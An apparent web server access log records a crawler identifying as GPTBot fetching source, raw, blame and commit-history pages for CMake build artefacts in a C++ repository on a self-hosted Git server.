"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43102] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:31:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42450] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9972] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21630] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21632] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21630] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21633] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21737] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13299] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11188] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11187] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11490] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10267] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15262] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10311] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11490] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11169] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10314] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14031] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10527] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33372] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr 